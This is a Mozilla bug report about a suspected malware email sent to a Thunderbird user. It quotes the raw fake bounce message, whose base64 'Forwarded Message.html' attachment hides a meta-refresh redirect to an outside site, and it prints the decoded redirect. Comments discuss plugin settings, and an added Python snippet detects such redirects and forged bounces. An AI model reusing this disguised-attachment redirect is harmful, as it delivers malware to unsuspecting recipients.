Open Bug 578297 Opened 10 years ago Updated 1 year ago

Accidentally opening an email attachment may have infected my computer

Categories

(MailNews Core :: Attachments, defect)

x86
Windows XP
defect
Not set

Tracking

(Not tracked)

UNCONFIRMED

People

(Reporter: jaco, Unassigned)

References

(Blocks 1 open bug)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.9) Gecko/20100317 Thunderbird/3.0.4

Please investigate the email below. Strange things started to happen when the attachment was opened by mistake (some Java app started, don't know the rest, I pulled the plug on my computer quickly).


Received: from localhost 
	for <xxxxxxx@xxxxxxx>; Fri,  9 Jul 2010 16:49:53 +0200 (CEST)
X-Virus-Scanned: Debian amavisd-new
Received: from 127.0.0.1
	by localhost 
	with ESMTP id 5gCD+2K-gdkn 
	Fri,  9 Jul 2010 16:49:46 +0200 (CEST)
Received: from vpn29-204.altair-tv.ru (unknown [109.111.19.204])
	by mailserver (Postfix) with ESMTP id 861DB1610356
	for <xxxxx@xxxx.com>; Fri,  9 Jul 2010 16:49:43 +0200 (CEST)
Received: from 109.111.19.204 by mx1.biz.mail.yahoo.com; Fri, 9 Jul 2010 18:44:57 +0300
Date:	Fri, 9 Jul 2010 18:44:57 +0300
From:	Mail Delivery Subsystem 
X-Mailer: The Bat! (v3.62.03) Professional
Reply-To: goulashfs6@rotp.com
X-Priority: 3 (Normal)
Message-ID: <396844352.28219839838582@rotp.com>
To: xxxxxx@xxxxxxx.com
Subject: Delivery Status Notification (Failure)
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----------B92A869A91FDE80E"

------------B92A869A91FDE80E
Content-Type: text/plain; charset=Windows-1252
Content-Transfer-Encoding: 7bit

Note: Forwarded message is attached.

This is an automatically generated Delivery Status Notification

THIS IS A WARNING MESSAGE ONLY.

Delivery to the following recipient has been delayed:


Message will be retried for 2 more day(s)


------------B92A869A91FDE80E
Content-Type: text/html; name="Forwarded Message.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Forwarded Message.html"

PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMDt1cmw9aHR0cDovL2lkaWVwZXJ1
Lm9yZy9pbmRleDMuaHRtbCIgLz4= 

------------B92A869A91FDE80E--



Reproducible: Didn't try
Please tell me Thunderbird doesn't enable Java by default.
Group: core-security
Jesse, is there even a pref for that? Or are you referring to a build-time option?
A new profile created with Lanikai on Mac OS X showed all plugins enabled.
mailnews.message_display.allow.plugins was true? Or plugins rendered content in messages despite that pref's value?
(In reply to comment #3)
> A new profile created with Lanikai on Mac OS X showed all plugins enabled.

The mailnews.message_display.allow.plugins pref should prevent them being used from within the content policy.
So I've just done

Components.classes['@mozilla.org/appshell/window-mediator;1']
  .getService(Components.interfaces.nsIWindowMediator)
  .getMostRecentWindow("mail:3pane")
  .document.getElementById("tabmail")
  .openTab("contentTab", {contentPage: "http://www.adobe.com/software/flash/about/"});

with mailnews.message_display.allow.plugins false, and that shows me that plugins aren't enabled.

However, I think we're going down the wrong track here.

Per comment 0:

> Please investigate the email below. Strange things started to happen when the
> attachment was opened by mistake (some java app started, don't know the rest, I
> pulled the plug on my computer quickly)

The attachment was *opened* by mistake, and then some java app started.

If this was the attachment being opened (I would guess into Firefox/another browser) and then that invoked the app or something else, then I'm not sure we can do much about it. Not convinced from the test case though; opening it as an .eml doesn't seem to do much.
Summary: Possible infection vulnerability? → Accidentally opening an email attachment may have infected my computer
(In reply to comment #0)
> ------------B92A869A91FDE80E
> Content-Type: text/html; name="Forwarded Message.html"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Forwarded Message.html"
> 
> PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMDt1cmw9aHR0cDovL2lkaWVwZXJ1
> Lm9yZy9pbmRleDMuaHRtbCIgLz4= 
> 
> ------------B92A869A91FDE80E--

Decoded HTML.
> <meta http-equiv="refresh" content="0;url=http://idieperu.org/index3.html" />

Data returned from the URL in the meta tag today.
> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
> <html><head>
> <title>404 Not Found</title>
> </head><body>
> <h1>Not Found</h1>
> <p>The requested URL /index3.html was not found on this server.</p>
> <p>Additionally, a 404 Not Found
> error was encountered while trying to use an ErrorDocument to handle the request.</p>
> <hr>
> <address>Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at idieperu.org Port 80</address>
> </body></html>

(In reply to comment #1)
> Please tell me Thunderbird doesn't enable Java by default.

Jesse Ruderman, does it mean that the URL returned HTML data which invoked a Java applet when you accessed it?
If so, it may mean idieperu.org was attacked.
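The decoding step above, turned into a small mail-filter check (an added example, not code from this bug or from Thunderbird): it walks the MIME parts of a message, base64-decodes any HTML attachment and flags a `<meta http-equiv="refresh">` redirect, and separately notes that a "Delivery Status Notification" that is plain multipart/mixed with a third-party Reply-To is not a real DSN (those are multipart/report per RFC 3464). The sample message is constructed to match the layout quoted in comment 0, with the same base64 attachment; the Received/X-* headers are left out.

```python
import email
import re
from email import policy

# Constructed sample: same MIME layout and the same base64 attachment as the
# message quoted in comment 0 (Received/X-* headers dropped, addresses as redacted there).
RAW_MESSAGE = """\
From: Mail Delivery Subsystem
Reply-To: goulashfs6@rotp.com
To: xxxxxx@xxxxxxx.com
Subject: Delivery Status Notification (Failure)
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------B92A869A91FDE80E"

------------B92A869A91FDE80E
Content-Type: text/html; name="Forwarded Message.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Forwarded Message.html"

PG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMDt1cmw9aHR0cDovL2lkaWVwZXJ1
Lm9yZy9pbmRleDMuaHRtbCIgLz4=

------------B92A869A91FDE80E--
"""

META_TAG = re.compile(r"<meta\b[^>]*>", re.IGNORECASE)
REFRESH = re.compile(r"http-equiv\s*=\s*[\"']?refresh", re.IGNORECASE)
TARGET = re.compile(r"url\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)

def find_refresh_redirects(raw):
    """Return (attachment filename, redirect URL) for every text/html part
    whose decoded body carries a <meta http-equiv="refresh"> redirect."""
    msg = email.message_from_string(raw, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        # get_payload(decode=True) undoes the base64 transfer encoding
        body = part.get_payload(decode=True).decode(
            part.get_content_charset() or "utf-8", errors="replace")
        for tag in META_TAG.findall(body):
            if REFRESH.search(tag) and (m := TARGET.search(tag)):
                hits.append((part.get_filename() or "(inline)", m.group(1)))
    return hits

def is_forged_bounce(raw):
    """True when a message claims to be a delivery status notification but is
    not multipart/report and asks for replies to go to a third party."""
    msg = email.message_from_string(raw, policy=policy.default)
    claims_dsn = "delivery status" in (msg["Subject"] or "").lower()
    return claims_dsn and msg.get_content_type() != "multipart/report" and msg["Reply-To"] is not None
```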
The attachment was opened from within Thunderbird by clicking on the attachment logo in the inbox list. I was expecting (my mistake) a Thunderbird message window, not something else.

Afterwards I looked at the source of the message, tried to b64decode the attachment, but messed that up so it showed me something binary. That made me wonder and send the bug report.

But nevertheless, it is too easy to trick people this way. The document index3.html has probably been discovered by idieperu.org and removed.
Component: General → Attachments
Product: Thunderbird → MailNews Core
QA Contact: general → attachments